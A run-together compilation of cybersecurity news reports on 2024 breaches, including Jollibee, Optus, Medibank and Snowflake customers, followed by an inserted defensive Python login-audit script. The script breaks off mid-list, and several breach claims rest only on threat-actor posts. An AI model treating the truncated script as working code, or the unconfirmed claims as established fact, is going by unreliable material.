The Philippines National Privacy Commission (NPC) regulations make it mandatory for organizations in the country to report and inform stakeholders of cybersecurity incidents within 72 hours of discovery. A statement was released on June 22 by Richard Shin, Chief Financial Officer and Corporate Information Officer of JFC, which said that it was addressing “a cybersecurity incident” that reportedly affected the company, “in addition to other subsidiaries”. “The Company is addressing the incident and has implemented its response protocols and deployed enhanced security measures to further protect the Company’s and its subsidiaries’ data against threats. The Company has also launched its investigation on the matter to understand the scope of this incident, and is currently working with the relevant authorities and experts in its investigation,” the statement said. JFC, however, added that its e-commerce platforms and those of its subsidiaries’ brands remained unaffected by the cyberattack and continued to be operational. It added that the safety of data from stakeholders was paramount for the company. “JFC recognizes the value and importance of the confidentiality of personal information of its stakeholders. The Company assures the public of its commitment to prioritize the protection and confidentiality of such personal information, including customer data, by continuously fortifying its defenses against future threats,” the company said. “The Company further assures the public that it continues to monitor and update its security measurements as appropriate under the circumstances, and as may be required by the results of its investigation into this matter,” it added. The fast-food delivery group urged the public to be vigilant and exercise good information security practices, including keeping passwords secure and changing them often.
Jollibee’s Cybersecurity Concerns
The claim of a data breach at the fast-food chain was posted on the popular data leak site BreachForums on June 20. The threat actor, “Sp1d3r”, claimed to have carried out a cyberattack and gained access to the data of 32 million Jollibee customers, including their names, addresses, phone numbers, email addresses and hashed passwords. The hacker also allegedly exfiltrated 600 million rows of data related to food delivery, sales orders, transactions and service details. JFC, meanwhile, is investigating this alleged cyberattack on its brands and subsidiaries, including Greenwich, Red Ribbon, Burger King Philippines, and Highlands Coffee. This is not the first time that Jollibee has faced flak for its cybersecurity measures. In December 2017, JFC had disclosed a data breach of its delivery website. The NPC had then warned that the data of 18 million customers was at “a very high risk” of being exposed. After an investigation, the NPC in May 2018 suspended Jollibee’s delivery website due to “serious vulnerabilities.” JFC also took down the delivery websites of its other brands. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Binance Steps in to Aid Investigation of BtcTurk Cyberattack, Freezes $5.3M in Stolen Funds
Decoding the BtcTurk Cyberattack
Cryptocurrency investigator ZachXBT hinted at a potential link between the BtcTurk breach and a $54 million Avalanche transfer. The transfer, involving 1.96 million AVAX to Coinbase and subsequent Bitcoin withdrawals from Binance, coincided suspiciously with the timing of the cyberattack on BtcTurk.
Source: X
Despite the setback, BtcTurk announced plans to gradually restore crypto deposit and withdrawal services once their cybersecurity measures are completed. They emphasized that their financial resilience surpasses the amount lost in the attack, ensuring that user assets remain unaffected. “Our teams have detected that there was a cyber attack on our platform on June 22, 2024, which caused uncontrolled footage to be taken. Only some of the balances in the hot wallets of 10 cryptocurrencies were affected by the cyber attack in question, and our cold wallets, where most of the assets are kept, are safe. BtcTurk's financial strength is well above the amounts affected by this attack, and user assets will not be affected by these losses”, reads the organization's statement.
Mitigation Against the Cyberattack on BtcTurk
The BtcTurk cyberattack specifically impacted deposits of various cryptocurrencies, including Bitcoin (BTC), Aave (AAVE), Algorand (ALGO), Ankr (ANKR), Cardano (ADA), Avalanche (AVAX), ApeCoin (APE), Axie Infinity (AXS), Chainlink (LINK), Cosmos (ATOM), Filecoin (FIL), among others, according to BtcTurk's statement. “Our teams are carrying out detailed research on the subject. At the same time, official authorities were contacted. As a precaution, cryptocurrency deposits and withdrawals have been stopped and will be made available for use as soon as our work is completed. You can follow the current status of the transactions on https://status.btcturk.com”, concludes the statement. As investigations continue, both BtcTurk and Binance are working diligently to mitigate the impact of the cyberattack and strengthen their security protocols to prevent future incidents. Users are encouraged to monitor official channels for updates on the situation. By collaborating and taking swift action, Binance and BtcTurk aim to uphold trust within the cryptocurrency community while enhancing the resilience of their platforms against online threats.
Jollibee Cyberattack: Data of 32 Million Customers of Fast Food Chain Allegedly Compromised
Details of Jollibee Cyberattack
The data breach of the fast-food chain was posted by the threat actor on the popular data leak site BreachForums. The threat actor stated that “Jollibee is a Filipino chain of fast-food restaurants owned by Jollibee Foods Corporation. As of September 2023, there were over 1,500 Jollibee outlets worldwide, with restaurants in Southeast Asia, East Asia, the Middle East, North America, and Europe.”
Source: X
The threat actor claimed to have carried out a cyberattack and gained access to the data of 32 million Jollibee customers, including their names, addresses, phone numbers, email addresses and hashed passwords. The hacker also allegedly exfiltrated 600 million rows of data related to food delivery, sales orders, transactions and service details. To support these claims, the TA included a sample in tabular data format accessible through spreadsheet programs like Microsoft Excel and Google Sheets. While the exact details of the alleged data breach remain unclear, the potential impact on millions of customers is cause for concern.
Jollibee Yet to React to Cyberattack Claims
The motive behind the Jollibee cyberattack remains unknown. So far, Jollibee Foods Corporation has not reacted or issued any official statement regarding the alleged data breach. The Cyber Express has reached out to the corporation to verify the claims. This article will be updated once the company responds to the allegations and shares any preventive measures in place to prevent critical data from being misused. The Philippines National Privacy Commission (NPC) has yet to receive any notification from Jollibee Foods Corporation regarding the breach. The NPC regulations require organizations to inform affected individuals and report such incidents within 72 hours of discovery.
Jollibee Cyberattack Threat Actor Responsible for Snowflake Breach
While Jollibee investigates the claims made by “Sp1d3r”, the threat actor has been responsible for several recent breaches, which include many customers of third-party cloud data storage vendor Snowflake. On June 1, “Sp1d3r” posted on the cybercriminal platform BreachForums that they had stolen the sensitive information of over 190 million people from QuoteWizard. The alleged database included customer details, partial credit card numbers, insurance quotes, and other information. The same threat actor was responsible for the data breach at American automobile aftermarket component supplier Advance Auto Parts, Inc. The attacker “Sp1d3r” claimed to have stolen three terabytes of customer data from the company’s Snowflake cloud storage and was selling the data for US$1.5 million. In its report, the company stated that the cyberattack could create damages up to $3 million. The Jollibee cyberattack is a stark reminder of the vulnerabilities of the digital world, where even the largest and most established companies could become victims of notorious data hackers. Customers should stay vigilant and follow any further guidance provided by Jollibee and cybersecurity professionals. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
2022 Optus Data Breach Could Have Been Averted Four Years Prior, Says Australian Telecom Watchdog
Coding Error and API Mismanagement Led to Optus Data Breach
The ACMA claimed that Optus had access controls in place for the API, but a coding error inadvertently weakened these controls, allowing them to be bypassed. This error left the API vulnerable, especially since it was internet-facing and dormant for an extended period. The vulnerability was reportedly introduced through a coding error in September 2018 and was first noticed in August 2021. But this issue was only fixed for the main site – www.optus.com.au – and not the subdomain (likely api.www.optus.com.au) where the vulnerable API endpoint was hosted.
“The coding error was not identified by Optus until after the cyberattack had occurred in mid-September 2022. Optus had the opportunity to identify the coding error at several stages in the preceding four years including: when the coding change was released into a production environment in September 2018; when the Target Domain (and the Main Domain) became internet-facing through the production environment in June 2020; and when the coding error was detected for the main domain in August 2021.” – ACMA
But the company failed to do so, causing alleged harm to more than one-third (approximately 36%) of the Australian population. The telco watchdog alleged that Optus’ failure to protect customer data constitutes a breach of its obligations under Australian law.
Optus’ Response to ACMA’s Allegations
Optus, in a statement to The Cyber Express, confirmed the vulnerability and provided details on the cyberattack. “The cyberattack resulted from the cyber attacker being able to exploit a previously unknown vulnerability in our defenses that arose from a historical coding error,” said Interim CEO of Optus Michael Venter.
“This vulnerability was exploited by a motivated and determined criminal as they probed our defenses, and then exploited and evaded these defenses by taking steps to bypass various authentication and detection controls that were in place to protect our customers’ data. The criminal did this by mimicking usual customer activity and rotating through tens of thousands of different IP addresses to evade detection.” – Michael Venter, Interim CEO of Optus
Venter said following the 2022 Optus data breach, the company has reviewed and updated its systems and processes. It has invested in heightened cyber defenses to address the increased global cyber risk environment. The company expressed regret over the incident and emphasized its commitment to protecting customer data. “Our customers expected their information would remain safe. We accept that this did not happen, and the cyber attacker gained unauthorised access to some of their information,” Venter said. Optus suffered a major customer data breach in 2022 that gave malicious actors access to about 9.5 million former and current customers' sensitive information including names, birth dates, phone numbers, email addresses and, for a subset of customers (2,470,036), addresses and ID document numbers such as driver’s license or passport numbers. Of these, the hacker also released the personally identifiable information (PII) of 10,200 Optus customers on the dark web.
Deloitte Report Handed to the Federal Court
After the hack, although the privacy commissioner and ACMA held detailed investigations, Optus itself commissioned an independent external review of the cyberattack. Despite attempts to keep the document confidential, the Australian federal court ordered Optus last month to file this report with the court, which is expected to provide crucial insights into the breach. “Optus is working with the ACMA and separately Slater and Gordon with the intention of providing them with a confidential version of the Deloitte Report that appropriately protects our customer data and systems from cybercriminals,” Venter told The Cyber Express. The forensic report prepared by Deloitte detailing the technical aspects of the breach was finally handed over to the federal court on Friday. The details revealed in this report will also be used in a separate class action against Optus.
“Much to do to Fully Regain our Customers’ Trust”
Optus has acknowledged the breach’s impact on customer trust, with Venter expressing deep regret for the incident. Optus has reimbursed 20,071 current and former customers for the cost of replacing identity documents. The company is also covering costs incurred by government agencies related to the breach. Optus has pledged to cooperate with the ACMA’s investigation and defend its actions in court, aiming to correct any misconceptions and improve its cybersecurity measures.
“Optus recognizes that we still have much to do to fully regain our customers’ trust and we will continue to work tirelessly towards this goal,” – Michael Venter
The Optus data breach highlights the critical importance of robust access controls and diligent monitoring of cybersecurity vulnerabilities. The incident serves as a cautionary tale for organizations worldwide to ensure comprehensive protection of sensitive data and maintain customer trust through proactive and transparent security practices. As the case progresses, it will provide further insights into the complexities of cybersecurity in the telecommunications sector and the measures necessary to prevent similar breaches in the future.
Apparent Ransomware Attack Halts Operations at Crown Equipment for Second Week
Crown Equipment Cyberattack Overview
Since approximately June 8th, Crown's employees have reported a breach in the company's IT systems. This breach led to a complete shutdown of systems, preventing employees from clocking in their hours, accessing service manuals, and in some cases delivering machinery. In an internal email sent to employees, the heavy machinery manufacturer confirmed the cyberattack and advised employees to ignore multifactor authentication (MFA) requests and to be cautious of phishing emails.
"I currently work there. Everyone is scrambling, can't order parts except for TVH and that's strictly for emergencies. The company hasn't officially announced that it's been hacked but they keep pushing the importance of MFA. We can read between the lines." - Reddit User (Williams2242)
The company in its press release revealed that the breach necessitated the shutdown of their operating systems to investigate and resolve the issue, without giving details on the hackers and their ransom demand, if any.
Crown Equipment Attack Details
Crown disclosed that many of their security measures were effective in limiting data access by the criminals. However, the breach likely occurred due to an employee not adhering to data security policies, which resulted in unauthorized access to their device, according to a Reddit post.
"I heard someone got a call from a hacker pretending to be IT. They installed a fake VPN on their computer and got access to everything. They created a privileged account on the network that gave them access to all the systems. The network went down Sunday and it's been down since with no ETA." - Reddit User (DragonflyJust2223)
This speculation suggests a social engineering attack where the threat actor installed remote access software on the employee's computer. BornCity, a website maintained by a German-speaking digital observer, first reported the possibility of a hack nearly a week ago. Citing a distant source who used to work at the manufacturing plant of Crown, BornCity said the problems were likely due to a 'coding bug.' "This had sent the Crown 360 (a service likely based on the Microsoft Cloud and Office 365) solution downhill – but I take that information not as reliable." Crown Equipment, however, did not confirm the speculation and thus the claims remain unverified.
Impact on Crown Equipment's Employees
Initially, Crown told employees they would need to file for unemployment or use their paid time off (PTO) and vacation days to receive pay for missed days. Last weekend, this directive was updated and the employees were asked to file for unemployment, after which several took to Reddit to vent their discontent.
"The fact that they're not paying people for their mistake is straight bu****it. Crown pretends to be a family company but as soon as they need to support their "family" they shaft them. People need this money to live, while the owner can just sit back and chill with his multi-millions in the bank. Crown needs to take the hit and do the right thing." - Reddit User
Another said:
Source: Reddit
However, Crown later decided to provide regular pay as an advance, allowing employees to compensate for the lost hours later. Despite this adjustment, employees expressed frustration over the lack of transparency and communication from the company during the incident. Crown Equipment has reportedly engaged some of the world’s top cybersecurity experts and the FBI to analyze the affected data and manage the aftermath of the attack. The company emphasized that there were no indications that employee personal information or data that could facilitate identity theft was targeted. The company is now in the process of restoring systems and transitioning back to normal business operations. They are also working closely with customers to minimize the disruption's impact on their operations. Although Crown did not specify the type of cyberattack, their description suggests a ransomware attack by an international cybercriminal organization. If confirmed, this implies that corporate data was likely stolen and could be leaked if the ransom demands are not met.
As Crown continues to recover from this significant disruption, the incident serves as a reminder for companies worldwide to strengthen their cybersecurity protocols, including isolating critical workloads, investing in employee training to prevent social engineering attacks, and establishing effective communication strategies for managing cyber incidents.
Advance Auto Parts Confirms Data Breach in SEC Filing; Reports Losses Around $300,000
Details of Advance Auto Parts SEC Filing
In its declaration to the SEC, the auto parts seller said that “There has been no material interruption to the Company's business operations due to the incident.” “Based on the review of files determined to have been impacted, the Company believes that some files contain personal information, including but not limited to social security numbers or other government identification numbers of current and former job applicants and employees of the Company,” the filing said. Advance Auto Parts said that the company would share information about the data breach and would offer free credit monitoring and identity restoration services to the impacted parties. The company noted that though it was covered by insurance, the cyberattack could cost damages up to $3 million. “The Company has insurance for cyber incidents and currently expects its costs related to response and remediation to be generally limited to its retention under such policy. The Company currently plans to record an expense of approximately $3 million for the quarter ending July 13, 2024, for such costs,” it said to the SEC. Advance Auto Parts currently operates 4,777 stores and 320 Worldpac branches primarily within the United States, with added locations in Canada, Puerto Rico, and the U.S. Virgin Islands. The Advance Auto Parts data breach is part of a recent series of attacks targeting customers of the cloud storage company Snowflake. These attacks have been taking place since at least mid-April 2024. Snowflake acknowledged the issue in a statement, informing a limited number of customers who it believes may have been impacted by the attacks. Snowflake is a prominent U.S.-based cloud data storage and analytics company, with over 9,800 global customers. Many of Snowflake’s clients had reportedly taken down their databases after the series of cyberattacks. In fact, a comprehensive report revealed that 165 customers were impacted by the Snowflake data breach.
It was on July 26, 2023 that the US Securities and Exchange Commission directed companies to mandatorily declare material cybersecurity incidents they experience and to disclose, on an annual basis, material information regarding their cybersecurity risk management, strategy, and governance.
Lack of MFA Implementation Likely Caused Medibank Data Breach
The Sequence of Events in the Medibank Breach
The attack on Medibank began when an IT service desk operator at a third-party contractor used his personal browser profile on a work computer and inadvertently synced his Medibank credentials to his home computer. This home device was infected with information-stealing malware, which allowed hackers to obtain these credentials, including those with elevated access permissions. The attackers first breached Medibank’s Microsoft Exchange server using these credentials on August 12, 2022, before logging into Medibank’s Palo Alto Networks GlobalProtect VPN. Incidentally, the VPN did not require multi-factor authentication (MFA), making it easier for the attackers to gain access. It was only in mid-October, when Medibank brought in a threat intelligence firm to investigate a Microsoft Exchange ProxyNotShell incident, that it discovered data had previously been stolen in a cyberattack.
"During the Relevant Period, the Admin Account had access to most (if not all) of Medibank's systems, including network drives, management consoles, and remote desktop access to jump box servers (used to access certain Medibank directories and databases)." - the OAIC report.
Security Failures and Missed Alerts
Lack of Multi-Factor Authentication (MFA)
One of the critical failures in the Medibank breach was the health insurer’s neglect to implement MFA for VPN access. The OAIC report said that during the relevant period, the VPN was configured to allow access with just a device certificate or a username and password. It did not require the additional security layer provided by MFA. This oversight significantly lowered the barrier for unauthorized access.
Operational and Alert Management Failures
Despite receiving several security alerts from their Endpoint Detection and Response (EDR) software about suspicious activities on August 24 and 25, these alerts were not appropriately triaged or escalated. This delay allowed the attackers to continue their operations undetected for an extended period, which ultimately led to the exfiltration of approximately 520 gigabytes of sensitive data from the company's MARS Database and MPLFiler systems.
Data Compromised and Consequences
The stolen data included highly sensitive information such as customers' names, dates of birth, addresses, phone numbers, email addresses, Medicare numbers, passport numbers and extensive health-related data. The exposure of such information has severe implications for the affected individuals, ranging from identity theft to potential misuse of medical data in various frauds and scams. The attackers, linked to the ransomware gang BlogXX, which is believed to be an offshoot of the notorious REvil group, leaked the data on the dark web. This incident not only caused significant distress to millions of Australians but also highlighted the grave consequences of inadequate cybersecurity measures.
Legal and Regulatory Actions Follow
The OAIC said that Medibank was aware “of serious deficiencies in its cybersecurity and information security” prior to the hack. For example, citing an Active Directory Risk Assessment report from Datacom in June 2020, OAIC said Medibank had an excessive number of individuals who had access to Active Directory (being the Microsoft directory service used for management of all Medibank users, group policies and domains).
"A number of individuals had been given excessive privileges to perform simple daily routines, and that MFA had not been enabled for privileged and nonprivileged users which was described as a “critical” defect."
Given the nature and the volume of the data Medibank stores and collects, “it was reasonable” for the company to adopt the security measures recommended by Australia’s privacy regulator, but “these measures were not implemented, or, alternatively, not properly implemented or enforced, by Medibank,” OAIC said.
Thus, in response to the breach and the negligence that led to it, Australia's data protection regulator OAIC announced legal action against Medibank for failing to protect personal information. The company faces potential fines exceeding AU$2 million. A spokesperson for the health insurer did not detail the plan of action against the lawsuit but earlier told The Cyber Express that “Medibank intends to defend the proceedings.”
Medibank Hacker Sanctioned and Arrested
Earlier this year, the U.S., Australia, and the U.K. sanctioned Aleksandr Gennadievich Ermakov, believed to be behind the 2022 Medibank hack. Ermakov, also known by aliases such as AlexanderErmakov and JimJones, was subsequently arrested by Russian police along with two others for violating Article 273, which prohibits creating or spreading harmful computer code. Extradition of Ermakov is unlikely given the current political climate.
Lessons and Recommendations
The Medibank breach underscores several critical lessons for organizations regarding cybersecurity:
1. Implementation of Multi-Factor Authentication: Utilizing MFA for all access points, especially VPNs, is essential. MFA adds an additional layer of security, making it significantly harder for attackers to exploit stolen credentials.
2. Proper Alert Management: Organizations must ensure that security alerts are promptly and effectively managed. Implementing robust procedures for triaging and escalating suspicious activities can prevent prolonged unauthorized access.
3. Regular Security Audits: Conducting regular security audits to identify and rectify vulnerabilities is crucial. These audits should include evaluating the effectiveness of existing security measures and compliance with best practices.
4. Employee Training: Continuous training for employees on cybersecurity best practices, including safe browsing habits and the importance of using corporate credentials responsibly, is vital to minimize the risk of breaches originating from human error.
IntelBroker Claims Apple Data Breach, Access to Source Code of Internal Tools
Decoding Apple Data Breach Claims
Per the available information, IntelBroker allegedly breached Apple’s security in June 2024 and obtained the internal source code of three commonly used Apple tools, namely AppleConnect-SSO, Apple-HWE-Confluence-Advanced and AppleMacroPlugin. The information was posted by the threat actor on BreachForums, a high-profile platform for trading stolen data and hacking tools. “I'm releasing the internal source code to three of Apple's commonly used tools for their internal site, thanks for reading and enjoy!” the TA posted. AppleConnect is the Apple-specific Single Sign-On (SSO) and authentication system that allows a user to access certain applications inside Apple's network. Apple-HWE-Confluence-Advanced might be used for team projects or to share information inside the company, and AppleMacroPlugin is presumably an application that facilitates certain processes in the company. Apple has not yet responded to the alleged data breach by IntelBroker or the leaked code. However, if the data breach occurred as claimed, it may lead to the exposure of information that is sensitive to the workings and operations of Apple. If legitimate, this breach could compromise Apple's internal operations and workflow, and leaked source code could expose vulnerabilities and the inner workings of these tools. The Cyber Express has reached out to Apple to learn more about the potential data breach. However, at the time of publication, no official statement or response has been received, leaving the claims of the Apple data leak unconfirmed for now. The article will be updated as soon as we receive a response from the tech giant.
Previous Attacks by IntelBroker
The alleged data breach at Apple could prove significant considering the history of the threat actor. IntelBroker is believed to be a mature threat actor and is known to have been responsible for high-profile intrusions in the past. On June 18th, 2024, chipmaker AMD acknowledged that it was investigating a potential data breach by IntelBroker. The attacker claimed to be selling stolen AMD data, including employee information, financial documents, and confidential information. Last month, the threat actor is believed to have breached data of the European Union’s law enforcement agency, Europol’s Platform for Experts (EPE). Other organizations whose data the attacker is believed to have breached include Panda Buy, Home Depot, and General Electric. The hacker also claimed to have targeted US Citizenship and Immigration Services (USCIS) and Facebook Marketplace.
Apple's Security Posture
Apple prides itself on its robust security measures and user privacy. However, the company has faced security threats in the past. In December 2023, Apple released security updates to address vulnerabilities in various Apple products, including iOS, iPadOS, macOS, tvOS, watchOS, and Safari. One critical vulnerability patched allowed attackers to potentially inject keystrokes by mimicking a keyboard. This incident highlights the importance of keeping software updated to mitigate security risks. In November 2023, there were reports of a state-sponsored attack targeting Apple iOS devices used in India. While details about this attack remain scarce, it serves as a reminder that even Apple devices are susceptible to cyberattacks.
Looking Ahead
The situation with IntelBroker's claims is ongoing. If the leak is verified, Apple will likely need to take steps to mitigate the potential damage. This could involve patching vulnerabilities in the leaked code and improving internal security measures. It is important to note that these are unconfirmed reports at this stage. However, they serve as a stark reminder of the ever-evolving cyber threat landscape. Apple, and all tech companies for that matter, must constantly work to stay ahead of determined attackers like IntelBroker. For users, it is a reminder to be vigilant about potential phishing attempts or malware that could exploit these alleged vulnerabilities. Keeping software updated and practicing good cyber hygiene are crucial steps for protecting yourself online.
Maxicare Confirms Data Breach in Third-Party Booking Platform, Ensures Core Systems Unaffected
Maxicare Data Breach: Immediate Response and Investigation
Upon learning of the potential security breach, Maxicare promptly initiated emergency measures to safeguard the privacy and security of the affected members. The company has launched a comprehensive investigation in collaboration with data security professionals and an industry-leading cybersecurity firm. "We launched an investigation together with a team of data security professionals and in partnership with an industry-leading cybersecurity firm," said a spokesperson from Maxicare. "Our team is fully adhering to all regulatory requirements by the National Privacy Commission. We will continue to communicate with our valued members on this matter."
Background on the Maxicare Security Breach
The security breach specifically involved the booking platform of Lab@Home, which facilitates home care services for Maxicare members. The information compromised includes details used for booking requests. Importantly, no sensitive medical records were accessed or compromised during this incident. Lab@Home's database is entirely separate from Maxicare's primary systems, which helps contain the breach and prevents it from spreading to other parts of Maxicare’s infrastructure. Maxicare is taking proactive steps to address the recent security incident involving unauthorized access to member information. Through immediate action, rigorous investigation, and ongoing communication, the company aims to ensure the continued trust and safety of its members. TCE will provide further updates as the situation evolves and more information becomes available.
Phishing Attack at Los Angeles County Department of Public Health Leads to Major Data Breach
Data Breach at Los Angeles County DPH: What Happened
The phishing email, designed to appear legitimate, tricked employees into divulging their credentials by clicking on a malicious link. This unauthorized access led to a wide-ranging compromise of data, affecting various individuals associated with DPH, including clients, employees, and others. The compromised email accounts contained a wealth of sensitive data. The potentially exposed information includes:
- First and last names
- Dates of birth
- Diagnosis and prescription details
- Medical record numbers/patient IDs
- Medicare/Med-Cal numbers
- Health insurance information
- Social Security numbers
- Other financial information
Data Breach at Los Angeles County DPH Notification
DPH is taking extensive steps to notify all potentially affected individuals. Notifications are being sent via post to those whose mailing addresses are available. For individuals without a mailing address, DPH also posts a notice on its website to provide necessary information and resources. The department has advised impacted individuals to review the content and accuracy of their medical records with their healthcare providers. On the delay in notification, Los Angeles County DPH said, “Due to an investigation by law enforcement, we were advised to delay notification of this incident, as public notice may have hindered their investigation.” To assist in protecting against potential misuse of their information, DPH is offering one year of free identity monitoring services through Kroll, a global leader in risk mitigation and response. “To help relieve concerns and restore confidence following this incident, we have secured the services of Kroll, a global leader in risk mitigation and response, to provide identity monitoring for one year at no cost to affected clients,” reads the notice.
Response and Preventive Measures
Upon discovering the Los Angeles County DPH data breach, DPH took immediate action to mitigate further risks. The department disabled the affected email accounts, reset and re-imaged the users’ devices, blocked the websites involved in the phishing campaign, and quarantined all suspicious incoming emails. Additionally, DPH has implemented numerous security enhancements to prevent similar incidents in the future. Awareness notifications have been distributed to all workforce members, reminding them to be vigilant when reviewing emails, especially those containing links or attachments. These measures aim to bolster the department’s defense against phishing attacks and other cyber threats. The incident was promptly reported to law enforcement authorities, who investigated the breach. The US Department of Health and Human Services’ Office for Civil Rights and other relevant agencies were also notified, as required by law and contractual obligations.
Steps for Individuals to Protect Themselves
While DPH cannot confirm whether any information has been accessed or misused, affected individuals are encouraged to take proactive steps to protect their personal information. These steps include:
- Reviewing Medical Records: Individuals should review their medical records and Explanation of Benefits statements for any discrepancies or unauthorized services. Any irregularities should be reported to their healthcare provider or health plan.
- Requesting Credit Reports: Individuals should remain vigilant against identity theft and fraud by regularly reviewing their financial statements and credit reports. Under US law, individuals are entitled to one free credit report annually from each of the three major credit reporting bureaus: Equifax, Experian, and TransUnion. Free credit reports can be requested at www.annualcreditreport.com or by calling 1-877-322-8228.
- Placing Fraud Alerts: Individuals can place a fraud alert on their credit files, which notifies creditors to take additional steps to verify identity before granting credit. Fraud alerts can be set up by contacting any of the major credit bureaus.
- Security Freezes: A security freeze can also be placed on credit reports, which prevents credit bureaus from releasing any information without written authorization. This measure can help prevent unauthorized credit activity but may delay the approval of new credit requests.
The Snowballing of the Snowflake Breach: All About the Massive Snowflake Data Breach
Why the Snowflake Breach Matters
Snowflake is a prominent U.S.-based cloud data storage and analytics company, with over 9,800 global customers. Its customer base includes major corporations like Adobe, AT&T, Capital One, DoorDash, HP, JetBlue, Mastercard, Micron, NBC Universal, Nielsen, Novartis, Okta, PepsiCo, Siemens, US Foods, Western Union, and Yamaha, among others. Snowflake holds approximately a 20% share of the data warehouse market and was recently ranked #1 on the Fortune Future 50 List, making it an attractive target for cybercriminals. However, it is crucial to note that the breaches are not necessarily due to failures by Snowflake. Correlation does not imply causation, as emphasized by Snowflake’s Chief Information Security Officer Brad Jones. The company, along with its forensic partners, found no evidence of vulnerabilities or breaches within Snowflake’s platform.
Ongoing Investigation and Preliminary Results in Snowflake Breach
On May 31, Snowflake revealed that attackers accessed customer accounts using single-factor authentication. According to preliminary results, these attackers leveraged credentials obtained through infostealing malware.
Compromised Employee Account
Snowflake confirmed that a threat actor obtained credentials from a single former employee, accessing demo accounts that were isolated from production and corporate systems. Snowflake’s core systems are protected by Okta and Multi-Factor Authentication (MFA), but the demo accounts lacked such safeguards.
Test Environments Targeted
Demo accounts are often overlooked as security risks. Despite assurances that these accounts do not contain sensitive data, they remain attractive targets due to their perceived value. Cybercriminals exploit the perception gap, knowing that a claimed breach of a high-profile company like Snowflake can generate significant media attention.
Attack Path
The initial access point for the attackers was almost certainly compromised credentials obtained through infostealing malware. Mandiant, which helped Snowflake in its investigation, confirmed that the compromised credentials were from customer instances and were traced back to infostealer malware logs. Several variants of infostealer malware were used, including VIDAR, RISEPRO, REDLINE, RACCOON STEALER, LUMMA, and METASTEALER.
Possible Reasons for the Breach
Mandiant confirmed that there was no breach of Snowflake’s enterprise environment. They identified that most credentials used by the attackers originated from historical infostealer infections. The lack of MFA and failure to rotate credentials for up to four years were significant factors. Network allow lists were also not used to restrict access to trusted locations.
Unconfirmed Threat Actor Claims
The threat actor also claimed to have logged into Snowflake’s ServiceNow using the same credentials. This claim has neither been confirmed nor explicitly refuted by Snowflake. Other unknowns include whether similar methods compromised other Snowflake employees, and the definition of "sensitive" data used for determining the impact on demo accounts. The investigation is ongoing, but Snowflake stands by its initial findings.
Affected Customers from Snowflake Breach
The data breaches began in April 2024, and the company claimed it had impacted a “limited” number of Snowflake customers. Snowflake initially did not disclose the exact number or the names of all affected customers. However, a comprehensive report from Mandiant two weeks after the initial disclosure revealed that 165 customers were impacted in the Snowflake data breach. While some victims have been identified through attackers’ offers to sell stolen data, others were revealed via mandatory public disclosures. Most companies have yet to confirm the impact. Following is a list of all companies known to have been impacted in the Snowflake data breach:
- Santander Group: The company confirmed a compromise without mentioning Snowflake.
- Impact: Santander Bank staff and 30 million customers’ data has allegedly been breached.
- TicketMaster (Live Nation Entertainment subsidiary): Confirmed via an SEC 8-K report, with Snowflake identified as the third party involved.
- Impact: 560 Million TicketMaster user details and card info potentially at risk.
- LendingTree: Notified by Snowflake about a potential data impact involving QuoteWizard.
- Impact: On June 1, a hacker going by the name “Sp1d3r” posted on the cybercriminal platform BreachForums that they had stolen the sensitive information of over 190 million people from QuoteWizard. The alleged database included customer details, partial credit card numbers, insurance quotes and other information.
- Advance Auto Parts: Unconfirmed by the company, but a dark web listing claimed significant data theft.
- Impact: Same actor as LendingTree claimed leak of 380 million customers and 358,000 former and current employees.
- Pure Storage: The Pure Storage data breach involved a third party temporarily gaining access to the workspace, which housed data such as company names, LDAP usernames, email addresses, and the Purity software release version number.
- Impact: The same threat actor known as “Sp1d3r” claimed responsibility, alleging the theft of 3 terabytes of data from the company’s Snowflake cloud storage that was reportedly being sold for $1.5 million.
Security Measures and Customer Support
Snowflake Chief Information Security Officer Brad Jones reiterated the company's findings, asserting that the breaches were not due to any vulnerabilities, misconfigurations, or breaches of Snowflake’s platform or personnel credentials. Snowflake is collaborating with customers to enhance security measures and plans to mandate advanced security controls such as multi-factor authentication (MFA) and network policies, especially for privileged accounts. The company acknowledges the friction in its MFA enrollment process and is working to streamline it. The shared responsibility model places MFA enforcement on customers, but Snowflake aims to make it a standard prerequisite due to the high sensitivity of the data stored in its cloud environments.
Key Recommendations for Snowflake Customers:
- Enforce Multi-Factor Authentication: Make MFA mandatory for all accounts, particularly those with privileged access.
- Regularly Rotate Credentials: Ensure that all credentials are regularly updated to prevent long-term exposure from previous leaks.
- Implement Network Allow Lists: Restrict access to trusted IP addresses to minimize unauthorized access.
- Enhance Logging and Monitoring: Improve logging and monitoring capabilities to detect and respond to suspicious activities promptly.
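The Medibank lessons above (a VPN that accepted a password alone, credentials that sat unrotated after being synced to an infected home machine) and the four Snowflake recommendations describe the same audit a customer can run against its own login history. The following is an added example, not code from Snowflake, Mandiant, Medibank or the OAIC: it walks a set of constructed login records, modelled on the column names of Snowflake's ACCOUNT_USAGE.LOGIN_HISTORY and USERS views (FIRST_AUTHENTICATION_FACTOR, SECOND_AUTHENTICATION_FACTOR, CLIENT_IP, PASSWORD_LAST_SET_TIME), and flags successful logins that had no second factor, came from outside a network allow list, or used a credential older than the rotation window. The allow list, the 90-day window, the user names and the sample rows are all constructed for the example.

```python
"""
Audit login-history records for the control gaps named in the Snowflake
recommendations: single-factor logins, access from outside a network allow
list, and credentials that have not been rotated.

Added example (not Snowflake's, Mandiant's or Medibank's code). Field names
mirror Snowflake's ACCOUNT_USAGE.LOGIN_HISTORY / USERS columns; the rows,
allow list and rotation window below are constructed, not real data.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Login:
    user_name: str
    event_timestamp: datetime
    client_ip: str
    first_authentication_factor: str
    second_authentication_factor: Optional[str]  # None == single-factor login
    is_success: bool


# Constructed reference time so the example is deterministic.
NOW = datetime(2024, 6, 20, tzinfo=timezone.utc)

# Constructed sample login rows (assumed, not real records).
SAMPLE_LOGINS = [
    Login("svc_etl", NOW - timedelta(hours=2), "203.0.113.45", "PASSWORD", None, True),
    Login("alice", NOW - timedelta(hours=1), "198.51.100.10", "PASSWORD", "DUO_PUSH", True),
    Login("bob", NOW - timedelta(minutes=30), "198.51.100.22", "PASSWORD", None, True),
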